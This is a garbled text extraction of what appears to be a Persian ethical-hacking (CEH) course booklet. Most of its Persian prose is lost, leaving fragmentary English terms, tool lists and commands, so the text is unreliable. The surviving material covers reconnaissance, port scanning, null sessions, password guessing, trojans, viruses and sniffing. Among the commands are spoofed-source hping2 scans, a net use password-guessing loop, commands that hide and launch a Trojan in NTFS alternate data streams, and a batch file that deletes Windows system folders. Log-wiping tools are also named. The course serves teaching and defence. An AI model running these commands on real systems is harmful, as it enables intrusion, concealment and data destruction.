
2

18

enumeration

36

61

Worm Virus Backdoor Trojan

87

Sniffer

108

Session hijacking Denial of Service

122

142

Buffer Overflow SQL Injection

164

10

178

11

189

12

200

13

IDS honeypot

211

14

223

15

229


CEH
. CEH
.


.
CEH
.


.

.
.


Mohsen_Azarnejad@yahoo.com
90



.
.
.
.


.
.
) (threat .
.

) (exploit
DoS .

exploit :
Remote exploit
.
Local exploit .
IT .
4

) (vulnerability .
.

) (target of evaluation .
) (attack .
.
.



.backdoor Sniffer rootkit exploit buffer overflow SQl injection
.
5

:
.

:
.

:Shrink-wrap code
. Microsoft word
.

:

.
.

.
.
.
) (insider ) (outsider
. .

. .


.
.

:1

.
.
. . ) social
(engineering ) (dumpster diving .
) (sniffing
IP
. :
.
7

IP .
rattling the door knob
.
.
.
.

:2
.
dialer
sweeper .
IP .
:3
.
.
) (LAN ) (local . session hijacking
DoS .stack-based buffer overflow ) owning the
(system .

:4
.
backdoor
rootkit .
. zombie .
:5

.
log ) (IDS .
steganography log .

Hacktivism
Hacktivism . .
deface DoS
. ) (hacktivism .


: .
.
9

: .

.
: . cracker
. .

. .
: .
) (.

cracker
" " !

.
.
cracker
DoS .
. .
.
cracker ) criminal hacker (
. ) (ethical hacker
.
.
10

)(Confidentiality

)(Integrity

)(Availability

. DoS .
DoS .

.

.

.
) (bit-flipping

.

.
11


.

.

.
. .



. .
.
.


.
.
.
.
12

:
http://nvd.nist.gov
www.securitytracker.com
www.microsoft.com/security
www.securiteam.com
www.packetstormsecurity.com
www.hackerstorm.com
www.hackerwatch.org
www.securityfocus.com
www.securitymagazine.com
www.milworm.com



. .

:
.1
.2 ) (NDA
.3
.4
.5
.6

13


.
:

.
.



. :
) :(remote .
.
:dial-up War dialing .
.
: .
.
: .
.
14

:
.
.
: .
rootkit key logger
.


.
) (target of evaluation
.

) (
) (Black box .
.
.
. :


. .

:



.
15

) (
.
.
.

.

) (
.
.
.

16


. .
.
. :





. .

.
.

17


) (footprinting .
footprinting .
. .
.

Footprinting
Footprinting
Footprinting .
.
.
.

Footprinting
Footprinting Footprinting .
.
.
.

19

.
Google hacking http://groups.google.com .
. http://people.yahoo.com http://www.intellius.com
. Google hacking :

Site . .

Filetype .

Link hyperlink .

Cache . .

Intitle .

Inurl . .

INURL: [parameter=] with FILETYPE: [ext] and INURL: [scriptname] :


Novell BorderManager :
Intitle: BorderManager information alert


.
.
:
IP
.
%90 %10 .

20


. footprinting
. :
Domain name lookup
Whois
Nslookup
Sam Spade



. whois DNS
IP .
.
21

Footprinting :
Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTracker Pro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-Mail Spider

DNS Enumeration
DNS DNS Enumeration.
DNS
IP .
ARIN DNSstuff NSlookup Whois
DNS enumeration .

Nslookup DNSstuff
nslookup . DNS
.
Sam Spade nslookup.
Whois nslookup IP

name server

) (AUTH1.NS.NY1.NET IP .

22

Whois

DNSstuff . .
nslookup DNS
http://www.dnsstuff.com DNS .
DNS http://www.eccouncil.org DNSstuff.com .
http://www.eccouncil.org IP .
name server IP .

Whois ARIN Lookup


Whois
.
.
ICANN .
Whois
.
Whois) Smart Whois(
IP
Smart Whois . Basic Whois.
23

ARIN IP .
ARIN Whois http://www.arin.net/whois .
Whois http://www.yahoo.com .
Whois .
IP
.
ARIN
.

ARIN http://www.yahoo.com
: ARIN RIPE NCC :
LACNIC .APNIC

24

Whois
( www.networksolutions.com ) Whois
: www.eccouncil.org Whois . Whois
Domain ID: D81180127-LROR
Domain Name: ECCOUNCIL.ORG
Created On: 14-Dec-2001 10:13:06 UTC
Last Updated On: 19-Aug-2004 03:49:53 UTC
Expiration Date: 14-Dec-2006 10:13:06 UTC
Sponsoring Registrar: Tucows Inc. (R11-LROR)
Status: OK
Registrant ID: tuTv2ItRZBMNd4lA
Registrant Name: John Smith
Registrant Organization: International Council of E-Commerce Consultants
Registrant Street1:67 Wall Street, 22nd Floor
Registrant Street2:
Registrant Street3:
Registrant City: New York
Registrant State/Province: NY
Registrant Postal Code: 10005-3198
Registrant Country: US
Registrant Phone: +1.2127098253
Registrant Phone Ext.:
Registrant FAX: +1.2129432300
Registrant FAX Ext.:
Registrant Email:forum@eccouncil.org
Admin ID: tus9DYvpp5mrbLNd
25

Admin Name: Susan Johnson


Admin Organization: International Council of E-Commerce Consultants
Admin Street1:67 Wall Street, 22nd Floor
Admin Street2:
Admin Street3:
Admin City: New York
Admin State/Province: NY
Admin Postal Code: 10005-3198
Admin Country: US
Admin Phone: +1.2127098253
Admin Phone Ext.:
Admin FAX: +1.2129432300
Admin FAX Ext.:
Admin Email:ethan@eccouncil.org
Tech ID: tuE1cgAfi1VnFkpu
Tech Name: Jacob Eckel
Tech Organization: International Council of E-Commerce Consultants
Tech Street1:67 Wall Street, 22nd Floor
Tech Street2:
Tech Street3:
Tech City: New York
Tech State/Province: NY
Tech Postal Code: 10005-3198
Tech Country: US
Tech Phone: +1.2127098253
Tech Phone Ext.:
Tech FAX: +1.2129432300
26

Tech FAX Ext.:


Tech Email:forum@eccouncil.org
Name Server: ns1.xyz.net
Name Server: ns2.xyz.net
Whois :
Wikto Footprinting Tool
Whois Lookup
SmartWhois
ActiveWhois
LanWhois
CountryWhois
WhereIsIP
ip2country
CallerIP
Web Data Extractor

Whois :
www.samspade.org
www.geektools.com
www.whois.net
www.demon.net
www.whatismyip.com


subnet mask .
IP . IP
ARIN AINA .
.
IP .
VisualRoute traceroute NeoTrace .

27

.
IP IP
.

DNS
DNS :

:A IP

:SOA DNS

:CNAME

:MX

:SRV directory services

:PTR IP

:NS Name server

traceroute footprinting
Traceroute .
ICMP . ICMP
TTL . .
. traceroute

.
Sam Spade traceroute .
tracert hostname traceroute . traceroute
www.yahoo.com .

28

.
tracert .

3D Traceroute
NeoTrace
VisualRoute Trace
Path Analyzer Pro
Maltego

Email Tracking
Email Tracking
. Email Tracking
.readnotify.com

29

.
.
VisualRoute Mail Tracker eMail Tracker Pro .

Web Spider
Spammer Web Spider .
Web Spider .
Web Spider @ .
Web .
Spider . Web Spider
. Web Spider
robots.txt crawling
.
: robots.txt
.

Web data Extractor 1st E-Mail Address Extractor .

Footprinting
.1
.2 Whois
30

.3 DNS
.4
.5
.6
.7 People Search
.8 NeoTracer
.9
.10 readnotify.com


.

.
. .



.

.
. .
.
VPN

.

31


.
.


:
:
help desk .
:
.
. phishing .


:
) :(Impersonating an employee or valid user
.
.
.
) :(Posing as an important user
.
.
.
) :(Using a third person
. .
32

) :(Calling technical support


. help desk .
.
) :(Shoulder surfing
.
) :(Dumpster diving
. .
.

. help desk .

Popup



.
.

Phishing

PIN .
33

.
.
phishing .
.

keylogger . worm
.
.
:
Mail server report.
Our firewall determined the e-mails containing worm copies are being sent from your computer.
Nowadays it happens from many computers, because this is a new virus type (Network Worms).
Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the
penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of
itself to these e-mail addresses
Please install updates for worm elimination and your computer restoring.
Best regards,
Customer support service
Pop-up
. Pop-up
.

URL obfuscation
URL .
URL obfuscation URL .
204.13.144.2/Citibank Citibank .
URL obfuscation phishing
34

.
. .
.
192.168.10.5 3232238085 .


.
.
.

.
. .

. .
.
.
.
. .

35

Enumeration


enumeration . enumeration
.
enumeration
.

.
IP
. IP
.


.
.
IP .

37

.

)(Port scanning
)(Network scanning


IP

) (Vulnerability scanning

: TCP/IP .
.
. 80
. .
:
C:\Windows\system32\drivers\etc\services

:
. IP .
: .
service pack
.
.
) (IDS .
TCP/IP
. .

38


.
.

Ping Sweep
.
ping sweep IP .
ping .
ICMP ICMP ping
. ICMP
.
Ping sweep ICMP
.

39

ping sweep .
.
Friendly Pinger Pinger Angry IP Scanner WS_Ping_Pro ICMP
.

Ping Sweep
IDS Ping Sweep IPS
. ping
ping sweep . ping
sweep . ping sweep
.
.


. .
.
.

.
.



.
:
40

IDS .

.

.

. stateful
TCP .

) (NIDS
Nmap .

.
.

Nmap
Nmap ping sweep IP
. Nmap
.
Nmap .
.
Nmap .
Nmap Nmap .
. .
Nmap
TCP connect
XMAS tree scan

TCP .
TCP XMAS-tree .
flag URG FIN PSH .

SYN stealth scan

) (half-open . SYN
41

. TCP . SYN-ACK
.

Null scan

. flag Null scan


.
. ACK scan
ACK scan .

Windows scan
ACK scan

: . Nmap
Nmap
-sT            TCP connect scan
-sS            SYN scan
-sF            FIN scan
-sX            XMAS tree scan
-sN            Null scan
-sP            Ping scan
-sU            UDP scan
-sO            Protocol scan
-sA            ACK scan
-sW            Windows scan
-sR            RPC scan
-sL            List/DNS scan
-sI            Idle scan
-P0            Don't ping
-PT            TCP ping
-PS            SYN ping
-PI            ICMP ping
-PB            TCP and ICMP ping
-PP            ICMP timestamp
-PM            ICMP netmask
-oN            Normal output
-oX            XML output
-oG            Greppable output
-oA            All output
-T Paranoid    Serial scan; 300 sec between scans
-T Sneaky      Serial scan; 15 sec between scans
-T Polite      Serial scan; 4 sec between scans
-T Normal      Parallel scan
-T Aggressive  Parallel scan, 300 sec timeout, and 1.25 sec/probe
-T Insane      Parallel scan, 75 sec timeout, and 3 sec/probe

42

Nmap cmd Nmap IP address


. 192.168.0.1 TCP connect
:
nmap -sT 192.168.0.1
HPING2
Traceroute
Traceroute ... .
:
Hping2 10.0.0.5
TCP null-flags 0 10.0.0.5 .

hping2 10.0.0.5 -p 80
80 .

hping2 -a 10.0.0.5 -S -p 81 10.0.0.25


trusted party SYN 81 .

hping2 www.debian.org -p 80 -A
80 www.debian.org ACK .

hping2 www.yahoo.com -p 80 -A
IPID .
43

IDLE NULL XMAS Stealth SYN FIN


:SYN SYN stealth
TCP . TCP/IP .
SYN SYN/ACK
. RST . SYN
stealth
.

:XMAS XMAS flag URG FIN PSH .


RST/ACK XMAS scan .
RFC 793 .

:FIN FIN XMAS FIN flag FIN .


scan XMAS scan .

44

:NULL NULL XMAS FIN flag


.
:IDLE IDLE IP SYN .
IDLE scan . sequence number IP .

flag TCP
TCP )(3-way handshake
. .


TCP SYN . TCP SYN ACK
.
ACK .

45

TCP ) (connection-oriented
. flag .
TCP flag PSH URG SYN RST ACK FIN . flag TCP
:
:(Synchronize) SYN .
:(Acknowledge) ACK .
:(Push) PSH .
:(Urgent) URG .
:(Finish) FIN .
:(Reset) RST .
flag TCP .
TCP
flag .
Flags sent by hacker                            Scan
All flags set (ACK, RST, SYN, URG, PSH, FIN)    XMAS scan
FIN                                             FIN scan
No flags set                                    NULL scan
SYN, then ACK                                   TCP connect/full-open scan
SYN, then RST                                   SYN scan/half-open scan

46

FloppyScan
.
mini Linux NMAP .
FloppyScan .


IPEye TCP Null FIN SYN XMAS .
) (Command-Line IPEye . .
) (closed . ) (reject
. ) (drop
. ) (open
.
IPSecScan IP IPSec
.
Hping2
traceroute mode ICMP UDP TCP .

47

SNMP Scanner DNS ping SNMP


.
Netscan Tools Pro 2000, Hping2, KingPing, icmpenum, SNMP Scanner
.

War-Dialing
War dialing
. war dialing
dial-up War dialing .
.
remote access
remote-access .
. PAP
VPN .

War-dialing ) (dial-in .
.
war-dialing .

THC-Scan, ModemScan, ToneLoc, Phonesweep, war dialer telesweep
.
.
.
48

Banner Grabbing
Banner Grabbing TCP/IP
.
. Banner grabbing .
. FTP
telnet . Microsoft Exchange
.
.
TCP .

.
.

sniffing .
IDS .
telnet banner grabbing .
telnet www.certifiedhacker 80
HEAD / HTTP/1.0
pof .
> p0f -i <your interface card number> . Httprint Miart
HTTP Header . PING XPROBE2
Netcraft V2 .
:
Bidiblah

Qualys Web-based Scanner (www.qualys.com/eccouncil)

SAINT
ISS Security Scanner
Nessus (for software)

49

GFI LANGuard
SATAN
Retina
Nagios
NIKTO (for web servers)
SAFEsuite Internet Scanner
IdentTCPScan


:
FriendlyPinger
LANsurveyor
Ipsonar
LANState

Insightix Visibility (www.insightix.com)

IPCheck Server Monitor (www.paessler.com)

PRTG Traffic Grapher


. )(proxy server
.
.
.
.
50

:
SocksChain
Proxy Workbench
ProxyManager
Super Proxy Helper
MultiProxy
TOR Proxy Chaining Software
Proxy Finder
ProxyBag
AutomatedProxy Leecher


) (Anonymizer
.

.
) (Anonymizer
51

.
.
:
StealthSurfer
Browzar
Torpak Browser
GetAnonymous
IP Privacy
Anonymity 4 Proxy
Psiphon
AnalogX Proxy
NetProxy
Proxy+
ProxySwitcher Lite
JAP
Proxomitron

HTTP Tunneling
IDS ) (SMTP
) (HTTP . IDS
.
HTTP HTTP
tunneling ) IM (
.

Httptunnel
HTTP telnet
. hts 80
23 :
hts -F server.test.com:23 80

52

htc . P
.
htc -P proxy.corp.com:80 -F 22 server.test.com:80
telnet localhost 80 80
23 .

IP Spoofing
IP .
(IP Spoofing) IP TCP .

53

) (source routing
. IDS
.
.

IP address spoofing TTL TTL : TTL


.
:
tracert -j 10.0.0.50 10.0.0.5
hping2 -G 10.0.0.50 10.0.0.5
IP Source Routing .

Enumeration
enumeration
.
.
enumeration
. .
IP .
IP MAC address .
54

2000 net view NetBIOS .


net view :
net view /domain
nbtstat -A <IP address>
share .

Null Session
Null session NetBIOS null .
sessions CIFS SMB.
SMB / CIFS .

NetBIOS null session


share . SMB
NetBIOS API 139 .
NetBIOS null session IPC$ .
net use . net use share
. )""(
. NetBIOS null session 192.21.7.1
net use :
55

Windows:

C:\> net use \\192.21.7.1\IPC$ "" /u:""

Linux:

$ smbclient \\\\target\\ipc\$ "" -U ""

net use
.
:
GetAcct user2sid sid2user enum SuperScan Nbtstat NetView DumpSec.

Null Session
Null sessions 139 137 135 TCP 445 .
. SMB
) (TCP/IP WINS client .
:
.1 properties .
.2 TCP/IP Properties .
.3 Advanced .
.4 WINS disable NetBIOS Over TCP/IP .

.
:
Regedt32 .1 HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
.2 Edit Add Value :
Value name: RestrictAnonymous .a
Data Type: REG_DWORD .b
Value: 2 .c

56

PS Tools enumeration . .
:PsExec
:PsFile
:PsGetSid SID
:PsKill
:PsInfo
:PsList
:PsLoggedOn local share
:PsLogList log
:PsPasswd
:PsService
:PsShutdown
:PsSuspend
:PsUptime

SNMP Enumeration
SNMP
SNMP . SNMP agent :
SNMP management station agent .
SNMP
agent SNMP management station .
agent agent Trap . management station
57

agent MIB .
.
SNMP SNMP agent management station
. read community string .
. read/write community string
. read community string public

read/write

community string private .


community string .
.
www.defaultpassword.com .

UNIX Enumeration Getif SNScan Solarwinds SNMPutil enumeration


.

SNMP enumeration
SNMP enumeration SNMP agent
SNMP . SNMP community
string . Group Policy
SNMP .

DNS Zone 2000


zone transfer nslookup .
:
nslookup
ls -d domainname
nslookup
:
58

Global Catalog service (_gc._tcp)
Domain controllers (_ldap._tcp)
Kerberos authentication (_kerberos._tcp)

properties DNS server .


LDAP . LDAP
.
LDAP Windows 2000 LDAP client . (ldp.exe) Active Directory Administration Tool
.
CD 2000 Support\Reskit\Netmgmt\Dstool .
:
.1 ldp.exe 389 .
.
.2 Connection Authentication .
. Guest .
.3 Search
Browse.
:
JXplorer
LdapMiner
Softerra LDAP Browser
NTP Enumeration
SMTPscan
Asnumber
Lynx
Winfingerprint
IP Tools Scanner
NBTScan
NetViewX
FreeNetEnumerator
Terminal Service Agent
TXDNS
Unicornscan
59

enumeration
.
:
.1 enumeration .
.2 null session .
.3 Windows enumeration Superscan .

60


.
.
.


.
.
.

.
brute-force .

.
:
.1 ) Administrator .(Guest
.2 .
.3 .
.4 .
.5 .

62

.
.

.
hash .
hash hash .
hash
.
SAM shadow .


Legion NetBIOS .
IP share .
NTInfoScan NT 4.0 NTInfoScan .
HTML .
Smbbf SMB .
53000 .
L0phtCrack . dictionary
brute-force hybrid.
John the Ripper Unix NT .
case insensitive .
63

KerbCrack kerbsniff : .kerbcrack kerbsniff


Windows 2000/XP kerbcrack
brute force dictionary.

LanManager Hash
2000 NT Lan Manager (NTLM) hashing
. NTLM hashing . 123456abcdef .
NTLM .123456ABCDEF :
blank 14 .123456ABCDEF__ :
14 123456A : __ .BCDEF
:
123456A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15
hash 6BF11E04AFAB197F F1E9FFDCC75575B15 .

                    LM                  NTLM v1             NTLM v2
hash key length     56bit+56bit         -                   -
hash algorithm      DES (ECB mode)      MD4                 MD4
hash value length   64bit+64bit         128bit              128bit
C/R key length      56bit+56bit+16bit   56bit+56bit+16bit   128bit
C/R algorithm       DES (ECB mode)      DES (ECB mode)      HMAC_MD5
C/R value length    64bit+64bit+64bit   64bit+64bit+64bit   128bit

64

2000
SAM hash
Windows\system32\config .
. SAM
DOS Linux CD . repair
. RDISK ) (rdisk /s
SAM __ SAM. c:\windows\repair .
cmd :
C:\>expand sam.__ sam
L0phtCrack dictionary
brute-force hybrid .

Win32CreatedLocalAdminUser x
administrator . Metasploit
Metasploit framework .
Offline NT Password Resetter administrator .
CD Linux NTFS
.
LCP XP 2000 NT 2003
Hybrid Dictionary Brute force.
Asterisk Logger Access Pass View Crack Ophcrack2 SID&User
Asterisk Key .

65

SMB Logon
SMB logon
. NTLM sniff
.
SMB Server .
.
SMB :

SMBRelay SMB Server hash SMB
SMBRelay . man-in-the-middle .
SMBRelay2 SMBRelay IP NetBIOS
.
Pwdump2 hash SAM .
L0phtCrack .
Samdump NTLM hash SAM .
C2MYAZZ
. .
66

SMB Relay MITM


SMB Relay MITM .
.

SMB relay 2000 SMB signing


SMB . Security Policies/Security
Options .

SMBGrind L0phtCrack dump .
SMBDie SMB XP 2000
NT crash.
NBTdeputy NetBIOS NetBIOS
. SMBRelay .


. 8 12 .
hash
67

. SYSKEY
log . brute-force
.
hash . 15
LM hash NT hash LM hash NT hash
brute force . LM hash SAM
. NTLM v2 NTLM Kerberos NT hash
LM LM hash NT hash . 98 95
:
:1 Group Policy Security Options Local Security Policy
Network security: Do not store LAN Manager hash value on next password change :

:2 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
NoLMHash .

:3 15 .
:
.1 .
.2 .
.3 whois
.
.4 .
.5 21 .

68


) (expire
.
.
. 30 .
.

Event Viewer Log


Event Viewer log
.
.
VisualLast log .
NT event log
.

.

69

Event log c:\windows\system32\config\SecEvent.Evt


brute-force .
AccountAudit
... .


.
:


. EC Council

:
o )($,:"%@!#
o
o
o

70


. :
:Passive online . passive online
man-in-the-middle sniffing reply.
:Active online Administrator . active online .
:Offline hybrid Dictionary brute-force.
Shoulder surfing :Nonelectronic .

Passive Online
passive online .
.
. hash
. hashing
toolkit
.

71

passive online (MITM) man-in-the-middle . MITM


. sniffer
sniff .
reply passive online
.
MITM -
.

Active Online

. active online
.

NetBIOS TCP 139


2000 NT . ) IPC$ (C$
. Administrator Admin
Sysadmin.
.
C :
\\ip_address\c$
72


.
.


.
Windows shell NET
USE . :
.1 Windows Notepad username password .
Dictionary Generator .
C: drive as credentials.txt .
.2 pipe FOR:
C:\> FOR /F token=1, 2* %i in (credentials.txt)
.3 net use \\targetIP\IPC$ %i /u: %j credentials.txt
share .


.
. .
.

) ( .
) ( )(
.

73


.
.
. .
:

Dictionary attack

Administrator

Hybrid attack

Adm1n1strator

Brute-force attack

Ms!tr245@F5a

.
. hash
. hash hash
.
.
hybrid .
.
1 .
brute-force . brute-
force .
.

74

Pre-Computed Hashes
hash
. hash
.

Nonelectronic
.
sniff shoulder surfing .

.
. help desk
.
.
Shoulder surfing .
.
.
.

.
.

75


:
http://www.defaultpassword.com
http://www.cirt.net/passwords
http://www.virus.org/default-password
PDF Password Cracker Abcom PDF Password Cracker
PDF .

keylogger spyware
keystroke logger
(keylogger) keystroke logger . .
keystroke logger
. keylogger
.
Keylogger
Keylogger .
.

Spector ) (spyware
.
Anti-spector . .

76

eBlaster
eBlaster .
.
SpyAnywhere
SpyAnywhere .
history .
Fearless Key Logger .
log .
E-mail Keylogger .
/ .
.
Keylogger :
Revealer Keylogger
Handy Key Logger
Ardamax Keylogger
Powered Keylogger
ELITE Keylogger
Quick Keylogger
Spy-Keylogger
Perfect Keylogger
Invisible Keylogger
Actual Spy
Spytector FTP Keylogger
IKS Software Keylogger
Ghost Keylogger


.
.
.

77

.

.
.
administrator
.

GetAdmin.exe administrator .
NT .
GetAdmin.exe . . Windows NT
4.0 SP3 .
HK.exe admin administrator .
Active@ Password Changer administrator local.
x.exe X X
administrator.


administrator
. back door
) ( keystroke logger
. .

78


PsExec .
.
Remoxec RPC DCOM .
Task Scheduler DCOM .
Alchemy Remote Executer
.
Esma FlexInfo Pro
CPU usage ....

Buffer Overflows
) Buffer overflows ( .
.

. cmd shell .

Rootkit
Rootkit .
Rootkit backdoor .
backdoor Rootkit .
rootkit
.

79

rootkit :
:Kernel-level rootkits rootkit
backdoor .
Kernel-level rootkit .
.
:Library-level rootkits rootkit ) (library
.
:Application-level rootkits rootkit
patch .

Rootkit 2000 XP
Windows NT/2000 rootkit Rootkit .
NT kernel Rootkit .
blue screen
EXE .
Rootkit kernel mode device driver _root_.sys
DEPLOY.EXE . _root_.sys DEPLOY.EXE
DEPLOY.EXE . rootkit
. DEPLOY.EXE . _ net stop _root
_ rootkit net start _root stop restart . rootkit _root_.sys
.

80

rootkit
rootkit administrator
. rootkit
.
MD5 checksum . 128 MD5 checksum
. checksum .
. checksum
.

Tripwire .
checksum Tripwire

.


.
. .
attrib . attrib :
attrib +h [file/directory]
NTFS data streaming .
NTFS alternate data streams
. .

81

NTFS File Streaming


NTFS file stream :
.1 cmd notepad test.txt .
.2 .
.3 cmd dir test.txt .
.4 cmd notepad test.txt:hidden.txt .
.
.5 ) (.
Test.txt .6 . .
.7 type test.txt:hidden.txt cmd . .
.8 Trojan.exe Readme.txt :
C:\> type c:\Trojan.exe > c:\Readme.txt:Trojan.exe
.9 Trojan.exe Readme.txt :
C:\> start c:\Readme.txt:Trojan.exe
.10 extract Trojan.exe Readme.txt :
C:\> cat c:\Readme.txt:Trojan.exe > Trojan.exe

Makestrm.exe alternate data stream
.

NTFS Stream
stream file FAT
NTFS . FAT stream
streaming NTFS .

LNS.exe NTFS streams . stream
.

82

Steganography
Steganography .

. steganography .

ImageHide steganography .
.
. sniffer
.
Blindside steganography BMP .
MP3Stego .
MP3 bit stream .
Snow whitespace steganography ASCII
whitespace . whitespace
.
.
Camera/Shy IE
gif .
Masker Steganography .
83

Stealth Files PowerPoint Excel Word Acrobat


.
:DCPP .

steganography :
wbStego Gifshuffle Pretty Good Envelope Steganos Steghide S-Tools Blindside Fort Knox
Video Steganography FoxHole Stegomagic StegaNote Cloak Hydan Data Stash OutGuess.

steganography .

Stegdetect steganographic
Steganography .
Dskprobe CD 2000 .
steganography .



.
.
.

84

Auditing
auditing .
log Windows Event Viewer .
Event log .
.
.

AuditPol auditing .
.

Event Log
Windows Event Viewer .
.
auditing
Event Viewer
AuditPol
auditing .
event log .

85


Elsave.exe event log . .
WinZapper security log
2000 WinZapper . .
Evidence Eliminator data cleaning
. system files Internet cache Recycle bin
temp folders ... Evidence Eliminator .
.
:
Traceless
Tracks Eraser Pro
Aromor
ZeroTracks
PhatBooster

86

Trojan, Backdoor, Virus, Worm


backdoor
:
. backdoor toolkit
.
worm backdoor .
backdoor
. backdoor worm
.
.

backdoor
Backdoor
. backdoor log
backdoor
.
backdoor .
backdoor .

.

. backdoor :
88

log . backdoor
.
RAT backdoor
. RAT

. backdoor RAT
: .
.


.

. DDOS
.
.

.
: IRC
. spyware
89

.
.
.
.
Trojan             Protocol   Port
BackOrifice        UDP        31337 or 31338
Deep Throat        UDP        2140 or 3150
NetBus             TCP        12345 and 12346
Whack-a-mole       TCP        12361 and 12362
NetBus 2           TCP        20034
GirlFriend         TCP        21544
Masters Paradise   TCP        3129, 40421, 40422, 40423, and 40426

overt covert
overt . covert
.
covert .
covert
.
Covert
. 80 .telnet

90


Loki shell ICMP
backdoor . ICMP .
Loki .

91


. :

:(RAT) Remote Access Trojans .

:Data-Sending Trojans .

:Destructive Trojans .

:Denial of Service Trojans DoS .

:Proxy Trojans .

:FTP Trojans FTP .

:Security software disabler Trojans .

Reverse-connecting
reverse-connecting
.
.reverse WWW shell ) 60(
.
92

Reverse WWW shell . HTTP .


. .

TROJ_QAZ notepad.exe note.com
notepad.exe . Notepad
. backdoor
7597 . TROJ_QAZ
.
Tini backdoor . 7777
Cmd . Tini Server
telnet 7777.
iCmd tini .
Proxy Server Trojan .
.

Donald Dick backdoor


. .
keylogger registry parser CD-ROM
.
23476 23477.
SubSeven
. IRC ICQ
.
.

93

NetBus Donald Dick . NetBus Server


HKEY_CURRENT_USER

HKEY_CURRENT_USER\NetBus Server\General\TCPPort . NetBus
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
NetBus Server .
BackOrifice 2000
TCP/IP BackOrifice .
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Plug-in . BackOrifice
remote desktop 3DES
UDP ICMP . ...
ComputerSpy Key Logger
: AIM AOL MSN ICQ Yahoo
Messenger .webmail
.
Beast WinLogon.exe .
Windows Explorer Internet Explorer .
all-in-one
.
CyberSpy Telnet Trojan
.
ICQ TCP/IP .
SubRoot 1700
.
LetMeRule .
Cmd .
.
94

Firekiller 2000 .
ATGuard
.
Hard Drive Killer Pro DOS
. .
) ( 1 2
.
Satellite- Turkojan DownTroj Biorante RAT T2W Backdoor.Theef :
HackerzRat SharK Rapid Hacker Poison Ivy Trojan.Hav-Rat DarkLabel B4 Yakoza RAT
AccRat OD Client ProAgent Optix PRO VicSpy Criminal Rat Beta 1337 Fun Trojan TYO
VNC Trojan TinyFTPD ZombieRat ConsoleDevil SINner RubyRAT Public Mhacker-PS
DaCryptic Dark Girl ProRat Troya Biohazard RAT Skiddie Rat DJI RAT Webcam Trojan
Hovdy.a PokerStealer.A Net-Devil.

Netcat
Netcat TCP UDP
. telnet shell .


.
CD-ROM background screen saver
.
.
:

.
95

Start .

ISP IP scanning .

taskbar .

Ctrl+Alt+Del .

Wrapping
Wrapper .
.
. wrapper
.
.

96


Graffiti .
.
.
RemoteByMail .
.

Silk Rope 2000 wrapper BackOrifice server .


EliTeWrap wrapper .
EliTeWrap
.
IconPlus .

.


.

.

signature .
Trojan Horse Construction Kit Senna Spy Generator :
Progenic Mail Trojan Construction Kit v2.0 .Pandoras Box
97


spyware .
backdoor
.
.

.
.


backdoor
.
.

98

Fport Netstat TCPView


.

Insider What's on my computer Process Viewer


.

What's on my computer MS Config


.

Ethereal .

Trojan scanner .

Port-Monitoring and Trojan-Detection


Fport TCP UDP . fport
.
Dsniff filesnarf Dsniff .
urlsnarf msgsnarf mailsnarf WebSpy
Sshmitm . webmitm man-in-the-middle
SSH HTTP (HTTPS) SSL .
PrcView
PrcView .
.
Inzider .
Inzider . BackOrifice
Task Manager
.
TCPView endpoint TCP UDP
.
99

Tripwire .
hash . Tripwire
.
.
HijackThis Autoruns What's Running Super System Helper CurrPorts Startup List.


2003 (Windows File Protection) WFP
. TTF OCX DLL SYS EXE
WFP .
.
sigverif .
sigverif :
.1 Start .
.2 Run .
.3 sigverif start . .
System File Checker
.
Windows\system32\dllcache overwrite . System File Checker
sfc /scannow.
XoftspySE Comodo BOClean TrojanHunter SPYWAREfighter Spyware Doctor.

100

worm
worm
. worm backdoor .
worm backdoor
.

worm
worm ) (malware .
.
. :
.

101

: ) (Infection ).(Attack
EXE
:

fragment :

102

Internet Explorer

worm worm .

. worm
.

103


: .
:

DLL INI

) (BAT

)(Source code


:
) polymorphic ( :
.
:Stealth
.
:Sparse infector .

:Armored .
104

:Cavity .

:Tunneling
.
) Companion( : .
companion notepad.com notepad.exe
) notepad.com ( .

) Camouflage( : .
:Bootable CD-ROM CD-ROM
. CD-ROM
. CD-ROM
.

105

NTFS :Active Directory NTFS Active Directory


.


) (batch file Game.bat :
@ echo off
*Del c:\winnt\system32\*.
*Del c:\winnt\*.
bat2com Game.com .
WINNT
.


. :
Kefi's HTML Virus Construction Kit
Virus Creation Laboratory v1.0
The Smeg Virus Construction Kit
Rajaat's Tiny Flexible Mutator v1.1
Windows Virus Creation Kit v1.00


.
.
.
.

106

checksum

)(virus signature

:
.1 . .
.2 netstat.exe fport.exe listdlls.exe handle.exe
pslist.exe .
.3 .
.
.4 .
.

Notepad EICAR.COM
. .
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

107

Sniffer


Sniffer .
. sniffer
.
Sniffer .
sniffer sniffer
.
sniffer . sniffer
sniffer .


sniffer MAC address MAC
address . ) (promiscuous mode .
MAC address
. ) (promiscuous mode
sniffer . ) (promiscuous mode
. promiscuous-mode
.
sniffing . HTTP
SNMP POP3 FTP sniffer
.

109


Ethereal sniffer .
WireShark Ethereal .
.
.
Snort ) (IDS .
buffer overflow Server Message Block (SMB) CGI
probes OS fingerprinting .
WinDump tcpdump .
WinDump tcpdump rule
.
EtherPeek .
OmniPeek .
WinSniffer .
IMAP Telnet SMTP ICQ HTTP POP3 FTP NNTP .
Iris
. sniffer Iris
.
Wiretap Pilot Look@LAN The Dude Sniffer.


: . ) (passive sniffing
.
) (active sniffing ARP spoofing traffic-flooding
.
110

.
passive packet sniffer
. .
MAC address . MAC table
MAC address .
MAC address
.
.

111

ARP Poisoning
ARP IP MAC . TCP/IP
MAC address .
ARP MAC address . ARP
broadcast : IP
IP ARP MAC address TCP/IP
.
ARP poisoning
sniff ARP poisoning .
ARP ARP spoofing .
MAC address .

) (DoS . ARP spoofing man-in-the-middle
ARP spoofing
.

112

ARP spoofing MAC address gateway ARP cache


. ARP s Cmd IP MAC
gateway . overwrite ARP cache
ARP spoofing
. enterprise port security MAC
address .

113
